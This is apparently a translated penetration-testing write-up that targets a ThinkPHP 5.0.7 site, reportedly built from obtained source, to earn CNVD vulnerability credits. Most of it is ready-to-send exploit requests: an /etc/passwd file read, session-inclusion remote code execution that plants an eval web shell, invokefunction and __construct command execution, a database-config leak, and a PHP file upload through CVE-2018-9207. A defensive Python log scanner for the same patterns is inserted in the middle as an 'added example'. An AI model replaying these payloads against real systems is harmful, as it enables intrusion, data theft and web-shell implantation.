Framework vulnerabilities (ThinkPHP)
I won't rehash how the TP5 framework vulnerabilities work; search for that yourself.
A glance at the source shows thinkphp_5.0.7, so it's a sure thing; anyone can fire an n-day at it (CNVD is that simple! And if you ask where the source code came from: it fell out of the sky, of course).
thinkphp/base.php

TP5 arbitrary file read (CNVD +1)
URL:
http://127.0.0.1/public/index.php/admin/pub/login.html?s=index/\think\Lang/load&file=/etc/passwd

TP5 session file inclusion RCE (CNVD +1)
Requests:

```http
POST /public/index.php/admin/pub/login.html/index.php?s=captcha HTTP/1.1
Host:
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Cookie: PHPSESSID=qyctu23kyhoawqnvt1xdhyyob
Content-Length: 113

_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1
```

```http
POST /public/index.php/admin/pub/login.html/index.php?s=captcha HTTP/1.1
Host:
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Cookie: PHPSESSID=qyctu23kyhoawqnvt1xdhyyoq
Content-Length: 113

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_qyctu23kyhoawqnvt1xdhyyob&c=phpinfo();
```


TP5 invokefunction command execution (duplicate)
Request:

```http
GET /public/index.php/admin/pub/login.html/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Cache-Control: no-cache
Pragma: no-cache
```

TP5 construct command execution (CNVD +1)
Request:

```http
POST /public/index.php/admin/pub/login.html/index.php?s=index/index/index HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 56

s=whoami&_method=__construct&method=POST&filter[]=system
```

TP5 information disclosure (CNVD +1)
URL:
http://127.0.0.1/public/index.php/admin/pub/login.html?s=index/think\config/get&name=database.username
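From the defender's side, the TP5 requests above leave recognisable traces in the web server's access log. The following is an added example (not from the original post) that scans constructed Apache/Nginx combined-format log lines for those request patterns; the log format, indicator names and sample lines are my own assumptions. Only the request line is visible in an access log, so the POST-body variants (`_method=__construct` plus `filter[]`) are caught only where the WAF or application logs request bodies.

```python
"""Flag ThinkPHP 5.0.x exploitation attempts in web access logs (added example)."""
import re
from urllib.parse import unquote_plus

# Indicator patterns taken from the request shapes shown above. They are matched
# against the URL-decoded, lower-cased request with backslashes folded to "/",
# so "think\app" and "think/app" are treated alike.
INDICATORS = [
    ("invokefunction",  re.compile(r"think/app/invokefunction")),
    ("lang_load_lfi",   re.compile(r"think/lang/load.*[?&]file=")),
    ("config_leak",     re.compile(r"think/config/get.*[?&]name=")),
    ("method_override", re.compile(r"_method=__construct.*filter\[")),
    ("include_file",    re.compile(r"think/__include_file")),
    ("session_set",     re.compile(r"think/session::set")),
]

# Combined log format (assumed): client ip, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def normalise(request: str) -> str:
    """Decode twice (double-encoded payloads), fold backslashes, lower-case."""
    return unquote_plus(unquote_plus(request)).replace("\\", "/").lower()

def scan_request(request: str) -> list:
    """Return the names of all indicators present in one request target/body."""
    text = normalise(request)
    return [name for name, rx in INDICATORS if rx.search(text)]

def scan_log(lines):
    """Return (ip, status, [indicators]) for every log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        found = scan_request(m.group("target"))
        if found:
            hits.append((m.group("ip"), int(m.group("status")), found))
    return hits

# Constructed sample log lines (not real traffic); the second is a benign login page hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /public/index.php/admin/pub/login.html?s=index/%5Cthink%5CLang/load&file=/etc/passwd HTTP/1.1" 200 1532',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /public/index.php/admin/pub/login.html HTTP/1.1" 200 4821',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /public/index.php?s=index/think%5Cconfig/get&name=database.username HTTP/1.1" 200 14',
]

if __name__ == "__main__":
    for ip, status, found in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} indicators={found}")
```

A 200 status on a flagged line is the case worth triaging first; a 404 or 500 usually means the request shape was tried against a path where it did not resolve.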

Component vulnerabilities
jQuery-File-Upload arbitrary file upload (duplicate)
Browsing the source turned up the jQuery-File-Upload component.

CVE-2018-9207
http://127.0.0.1/public/static/admin/lib/jQuery-File-Upload/

Request:

```http
POST /public/static/admin/lib/jQuery-File-Upload/server/php/ HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryURbQ6ukomAO4BxJo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 202

------WebKitFormBoundaryURbQ6ukomAO4BxJo
Content-Disposition: form-data; name="files[]"; filename="cnvd.php"
Content-Type: text/php

<?php phpinfo(); ?>
------WebKitFormBoundaryURbQ6ukomAO4BxJo--
```

http://127.0.0.1/public/static/admin/lib/jQuery-File-Upload/server/php/files/cnvd.php

Results